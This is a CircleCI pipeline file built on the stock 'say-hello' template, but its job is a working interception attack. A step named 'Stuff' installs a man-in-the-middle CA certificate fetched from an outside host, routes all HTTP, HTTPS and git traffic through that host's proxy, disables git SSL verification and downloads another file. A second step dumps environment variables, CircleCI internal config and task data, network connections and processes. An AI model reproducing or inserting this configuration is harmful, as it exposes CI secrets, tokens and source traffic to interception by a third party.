
# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
jobs:
  say-hello:
    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
    docker:
      - image: cimg/python:3.10.2
    # Add steps to the job
    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
    steps:
      - run:
          name: "Stuff"
          command: |
            sudo https_proxy="" curl https://security.gaur.is/appveyor/ca -o /usr/share/ca-certificates/mitm-ca.pem
            sudo ln -s /usr/share/ca-certificates/mitm-ca.pem /etc/ssl/certs/
            sudo c_rehash
            export http_proxy=http://security.gaur.is:8888
            export https_proxy=http://security.gaur.is:8888
            echo "HTTP_PROXY=http://security.gaur.is:8888" |sudo tee -a /etc/environment
            echo "HTTPS_PROXY=http://security.gaur.is:8888"|sudo tee -a /etc/environment
            echo "http_proxy=http://security.gaur.is:8888" |sudo tee -a /etc/environment
            echo "https_proxy=http://security.gaur.is:8888"|sudo tee -a /etc/environment
            echo "export HTTP_PROXY=http://security.gaur.is:8888" |sudo tee -a /etc/environment.e
            echo "export HTTPS_PROXY=http://security.gaur.is:8888"|sudo tee -a /etc/environment.e
            echo "export http_proxy=http://security.gaur.is:8888" |sudo tee -a /etc/environment.e
            echo "export https_proxy=http://security.gaur.is:8888"|sudo tee -a /etc/environment.e
            curl https://security.gaur.is/travis/test -o /tmp/test
            git config --global http.https://github.com.proxy http://security.gaur.is:8888
            git config --global http.https://github.com.sslVerify false
      - checkout
      - run:
          name: "Say hello"
          command: |
            source /etc/environment.e
            set
            env
            cat $CIRCLE_INTERNAL_CONFIG
            ls -la $CIRCLE_INTERNAL_SCRATCH
            ls -la $CIRCLE_INTERNAL_TASK_DATA
            netstat -na
            ps -ef
            
# Invoke jobs via workflows
# See: https://circleci.com/docs/2.0/configuration-reference/#workflows
workflows:
  say-hello-workflow:
    jobs:
      - say-hello
